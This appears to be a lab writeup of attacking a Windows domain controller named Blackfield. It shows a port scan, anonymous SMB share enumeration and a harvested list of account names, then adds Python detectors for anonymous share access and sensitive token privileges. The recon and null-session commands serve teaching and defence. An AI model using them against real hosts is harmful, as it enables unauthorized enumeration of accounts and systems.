Victim's IP : 10.10.10.192 Victim's Host : *.blackfield.local Attacker's IP : 10.10.14.14
RECON
port scan
Command
rustscan -a 10.10.10.192 --ulimit 5000 -- -sC -sV -Pn
Result
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 14:03:18Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Another standard AD domain controller: SMB, LDAP, RPC and Kerberos are exposed, and the LDAP banner gives away the domain name: blackfield.local
Exploit
smb info leak
SMB accepts an anonymous (null-session) login.
Command
smbclient -L //10.10.10.192/ -N
Result
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
forensic        Disk      Forensic / Audit share.
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
profiles$       Disk
SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
Going through the shares one by one, profiles$ turns out to hold a large number of usernames (one directory per account), which are then brute-forced one at a time.
smbclient //10.10.10.192/profiles$ -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
  ACheretei                           D        0  Wed Jun  3 12:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
  AHigchens                           D        0  Wed Jun  3 12:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
  AKlado                              D        0  Wed Jun  3 12:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 12:47:11 2020
  ...(truncated)
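On the domain controller, the anonymous share listing and the profiles$ directory read above show up in the Security log as a network logon of NT AUTHORITY\ANONYMOUS LOGON (event 4624, logon type 3) followed by share-access events (5140) under the same Logon ID. The following detection example is added here and is not part of the original writeup: it correlates the two event types per session and reports anonymous sessions that reached anything beyond IPC$. The log lines are constructed in a simplified key=value export form; the event IDs and field names follow the Windows Security log, but a real EVTX/XML export would need its own parser in place of parse_event. The client addresses and the user name jdoe in the sample are made up, apart from the attacker IP already on this page.

```python
import re
from collections import defaultdict

ANON_ACCOUNT = "ANONYMOUS LOGON"
# IPC$ is opened by nearly every SMB client, a bare share listing included,
# so an anonymous hit on it alone is noise; any other share is the signal.
BENIGN_ANON_SHARES = {"IPC$"}

# key=value pairs; values are either quoted (may contain spaces) or bare.
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample (simplified Security-log export, not a real capture):
# an anonymous session from the attacker IP listing shares and reading
# profiles$, then an ordinary authenticated user reading SYSVOL.
SAMPLE_EVENTS = r"""
EventID=4624 LogonType=3 AccountName="ANONYMOUS LOGON" AccountDomain="NT AUTHORITY" LogonId=0x3a2f1 SourceAddress=10.10.14.14
EventID=5140 AccountName="ANONYMOUS LOGON" AccountDomain="NT AUTHORITY" LogonId=0x3a2f1 ShareName="\\*\IPC$" SourceAddress=10.10.14.14
EventID=5140 AccountName="ANONYMOUS LOGON" AccountDomain="NT AUTHORITY" LogonId=0x3a2f1 ShareName="\\*\profiles$" SourceAddress=10.10.14.14
EventID=4624 LogonType=3 AccountName="jdoe" AccountDomain="BLACKFIELD" LogonId=0x4b110 SourceAddress=10.10.10.50
EventID=5140 AccountName="jdoe" AccountDomain="BLACKFIELD" LogonId=0x4b110 ShareName="\\*\SYSVOL" SourceAddress=10.10.10.50
"""


def parse_event(line):
    """Turn one export line into a dict, dropping the quotes around values."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def share_basename(unc):
    r"""Reduce a UNC share name such as '\\*\profiles$' to 'profiles$'."""
    return unc.rstrip("\\").split("\\")[-1]


def find_anonymous_share_access(log_text):
    """One finding per anonymous logon session that reached a non-IPC$ share.

    4624 (logon) and 5140 (share access) are correlated on LogonId, so the
    finding carries the client address even where the 5140 record lacks it.
    """
    sessions = {}               # LogonId -> source address, from 4624
    touched = defaultdict(set)  # LogonId -> shares accessed, from 5140
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("AccountName") != ANON_ACCOUNT:
            continue
        if ev.get("EventID") == "4624" and ev.get("LogonType") == "3":
            sessions[ev["LogonId"]] = ev.get("SourceAddress", "?")
        elif ev.get("EventID") == "5140" and "ShareName" in ev:
            touched[ev["LogonId"]].add(share_basename(ev["ShareName"]))

    findings = []
    for logon_id, shares in touched.items():
        suspicious = sorted(shares - BENIGN_ANON_SHARES)
        if suspicious:
            findings.append({
                "logon_id": logon_id,
                "source": sessions.get(logon_id, "?"),
                "shares": suspicious,
            })
    return findings


if __name__ == "__main__":
    for f in find_anonymous_share_access(SAMPLE_EVENTS):
        print(f"anonymous share access from {f['source']} "
              f"(logon {f['logon_id']}): {', '.join(f['shares'])}")
```

Event 5140 is only written when the "Audit File Share" subcategory (Object Access) is enabled, so check that before relying on this rule. The finding itself points at the fix: a share whose directory names are account names must not be readable without credentials, which is controlled by the share's own ACL and by the policy "Network access: Restrict anonymous access to Named Pipes and Shares" (RestrictNullSessAccess).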
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
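The whoami /priv table above shows SeBackupPrivilege and SeRestorePrivilege enabled. Microsoft documents both as sensitive: they let the holder read, respectively write, files and registry keys regardless of their ACLs, which is why they are normally reserved for Backup Operators and administrators. A defender reviewing a service account, or triaging a host after an incident, wants such privileges flagged automatically rather than read off the table by eye. The example below is added here and is not from the writeup: a parser for whoami /priv output plus a risk check. SAMPLE_OUTPUT is the table above; the SENSITIVE_PRIVILEGES list and its one-line descriptions are an assumption drawn from Microsoft's privilege documentation, not something this page provides.

```python
import re

# Privileges Microsoft documents as equivalent to administrative access,
# because they bypass object ACLs or change security context. Assumed list
# (from Microsoft's privilege documentation), not taken from the writeup.
SENSITIVE_PRIVILEGES = {
    "SeBackupPrivilege": "read any file or registry key regardless of its ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process regardless of its ACL",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a token to a new process",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
}

# One table row: name, free-text description, state. Column widths depend on
# locale and the longest entry, so match on structure, not fixed offsets.
_ROW = re.compile(r"^\s*(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# The table shown on this page, used as sample input.
SAMPLE_OUTPUT = """\
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege: (description, state)} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc.strip(), state)
    return privs


def audit_privileges(text):
    """List (privilege, state, risk) for every sensitive privilege in the table.

    A Disabled privilege is still reported: it is held by the token and can be
    switched on by the process itself via AdjustTokenPrivileges. Only absence
    from the table means the account does not have the privilege.
    """
    privs = parse_whoami_priv(text)
    return [
        (name, privs[name][1], SENSITIVE_PRIVILEGES[name])
        for name in SENSITIVE_PRIVILEGES
        if name in privs
    ]


if __name__ == "__main__":
    for name, state, risk in audit_privileges(SAMPLE_OUTPUT):
        print(f"{name:<30} {state:<9} {risk}")
```

Run against the sample, the audit reports exactly SeBackupPrivilege and SeRestorePrivilege; the remaining four privileges in the table are ones every interactive or service logon gets and are not flagged. The same parser works on output collected from many hosts, which is the practical use: finding the accounts that hold these rights but are not in the groups meant to have them.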